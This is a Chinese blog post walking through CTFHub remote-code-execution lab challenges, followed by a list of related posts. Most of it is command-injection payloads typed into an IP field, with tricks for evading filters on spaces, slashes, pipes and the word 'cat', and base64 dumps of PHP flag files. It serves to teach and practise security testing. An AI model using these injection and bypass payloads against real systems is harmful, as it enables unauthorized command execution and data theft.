CTF-RCE

已于 2024-08-05 20:56:55 修改
阅读量407 收藏 10
点赞数 4
文章标签: 网络安全
于 2024-08-05 20:56:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/140936869
版权

eval执行

?cmd=systemctl("ls");

?cmd=systemctl("ls /");

?cmd=systemctl("cat /flag_27523);

命令注入

输入ip试试发先可以执行

127.0.0.1

查看一下看看有社么

127.0.0.1 | ls

试着看看php文件

127.0.0.1 | cat 297581345892.php

貌似这个文件有东西

127.0.0.1 | cat index.php

应该是文件中包含特殊字符,使用管道运行base64加密内容

127.0.0.1 | cat *.php | base64

挨个解码一下结果第一个就是

过滤cat

试试127.0.0.1发现过滤了cat

ls发现flag.php

127.0.0.1 | ls
127.0.0.1 | ls

而cat被禁用了

  • linux查看文本的命令
    • cat 由第一行开始显示内容,并将所有内容输出
    • tac 从最后一行倒序显示内容,并将所有内容输出
    • more 根据窗口大小,一页一页的现实文件内容
    • less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
    • head 只显示头几行
    • tail 只显示最后几行
    • nl 类似于cat -n,显示时输出行号
    • tailf 类似于tail -f

这里选择more试试

127.0.0.1 | more flag_1080915285305as97.php

猜测跟上一题一样

127.0.0.1 | more flag_1080915285305as97.php | be64

解码

过滤空格

输入127.0.0.1看看发现过滤空格

那我们将空格替换

这边我选择/**/替代

127.0.0.1/**/|/**/ ls

127.0.0.1/**/|/**/ cat/**/flag_62271467726390.php/**/|/**/base64

这边不成功我们换一个<

127.0.0.1|cat<flag_62271467726390.php|base64

解码

过滤目录分隔符

127.0.0.1 | ls

发现了flag.php因为过滤了/\不能使用ls/查看子目录使用cd

127.0.0.1;cd flag_is_here;ls

cat他

127.0.0.1;cd flag_is_here;cat flag_31823208020462.php|base64

解码

过滤运算符

看到过滤运算符我们这边用;代替|

127.0.0.1;ls

过滤了管道符|,不能再使用了
base64 falg.php".这个与127.0.0.1| cat falg.php | base64是等价的

127.0.0.1 ; base64 flag_15688173330737.php

解码

综合练习

发现过滤了一堆我们可以用的

空格可以用${IFS}

cat可以用more

flag可以用正则f***

查了一下,在linux下,命令分隔符除了;还有%0a

因为分割符为%0a所以要在url里输入,因为在框内会二次编码

?ip=127.0.0.1%0als

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0als

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0abase64${IFS}f***_21697538524058.php

解码

mouyu⇔
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHUB-web-RCE
ookami6497的博客
12-03 1443
my-ctf-challenges:我创建的CTF挑战
05-28
我的CTF挑战 Balsn CTF 2020 名称 类型 困难 关键字词 网页 ★★★☆☆ 跨站点脚本包含,XSSI,Selenium爬网程序,同源策略 网络,杂项 ★★★☆☆ 命令注入,命令行参数注入 Balsn CTF 2019 名称 类型 困难 关键字词 网络,杂项 ★★★★☆ Python导入RCE,gunicorn前叉工作者模型,正则表达式DoS 网页 ★★★☆☆ Windows命令注入,Python库,0天 网页 ★★★★★ JavaScript,WebRTC STUN,协议走私,不安全的端口限制绕过 AIS3 EOF CTF 国产周转基金 周大福 名称 类型 困难 关键字词 2020年质量 网页 ★☆☆☆☆ XSS,基于cookie的会话 2019年质量 杂项 ★☆☆☆☆ 庞氏骗局,互动,投资,金融 2019年总决赛 网页 ★★☆☆☆ Windows命
CTFhub-RCE-远程包含
ssss39的博客
11-14 197
给咱一个phpinfo那么必然有他的道理PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。allow_url_fopen = On 是否允许打开远程文件allow_url_include = On 是否允许include/require远程文件。
CTFHUB--RCE漏洞初步学习
qq_75120258的博客
03-27 720
关于RCE,在学习过程中其实已经接触到了很多,但在学习的时候都是这儿那儿一点一点的拼接起来的,所以看了很多大佬的博客,总结了一下,打算写一篇博客,好好的整理一下自己学习RCE所学到的东西。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2082
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
【web-ctfctf-pikachu-RCE
一个努力生活的人的博客
07-11 784
pikachu-RCE
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 579
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFhub-RCE-过滤空格
ssss39的博客
11-16 371
IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。< 、>、、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等。2. 查看 flag_890277429145.php。1. 查看当前目录:127.0.0.1|ls。
CTFHuB命令执行--Rce
记录开发和安全学习过程中的点点滴滴
03-09 957
Command Injection,即命令注入攻击,是指由于嵌入式应用程序或者 web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。其实关于这个练习已经过去了很久了,但我还是要那出来进行一次复习吧,对与命令执行相关的一些操作,对自己在漏洞挖掘方面能有更多的帮助,通过这次练习也对自己关于代码审计或是关于linux命令的常见命令的同意替换有了更多的了解。
My-CTF-Challenges
05-16
在Java中,如果反序列化的类没有正确实现`readObject()`方法或者不安全的对象被反序列化,攻击者可以通过构造恶意的序列化数据来执行任意代码,从而导致远程代码执行(RCE)或权限提升等安全问题。 对于这个挑战,...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
CTF-Writeups
05-16
CTF编写 该存储库是我为已解决的每个房间/机器编写的所有文章的集合。 文章和平台 Tryhackme 房间名称 难度级别 专注技能 :United_States: 难的 SSH隧道,SQL RCE,PATH变量Privesc Vulnhub 房间名称 难度级别 ...
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ctf---rce
weixin_51520483的博客
05-15 430
②flag参数传入含有please_give_me_flag的字符串 查阅可以进行RCE的函数,发现还有一个array_map()可以使用 array_map()需传入两个参数,第一个参数为使用的函数,第二个参数为一个数组,并且数组的数据为函数的参数,例如。①能直接用的命令执行函数基本上都被过滤了,限制了flag字符串长度,并且过滤了preg_replace()中的please_give_me_flag,但是没有使用/i大小写不敏感,所以可以用大写绕过 task参数传入的为我们需要执行的代码,
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学生电子设计大赛-0-30V 4A数控稳压电源资料.rar
08-12
大学生电子设计大赛-0-30V 4A数控稳压电源资料.rar
基于Springboot和Vue的网上商城系统源码 网上商城系统代码(高分毕设)
最新发布
08-12
网上商城系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
大学生电子设计大赛-《数字电子技术》 电子教案.rar
08-12
大学生电子设计大赛-《数字电子技术》 电子教案.rar
ctfhub RCE
08-18
CTFHub RCE(Remote Code Execution)是指在CTFHub平台上利用漏洞或安全问题,远程执行恶意代码或命令的攻击行为。这种攻击通常会利用软件或网站存在的漏洞,通过远程执行代码来获取非授权的访问权限或对系统进行控制。 请注意,RCE是一种非法的攻击行为,严重侵犯了他人的隐私和系统安全。在任何情况下,我都不能提供关于如何进行RCE攻击的具体指导或支持。如果您对CTFHub或其他相关安全问题有任何合法的疑问或需求,请提供更具体的信息,我将尽力帮助您。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值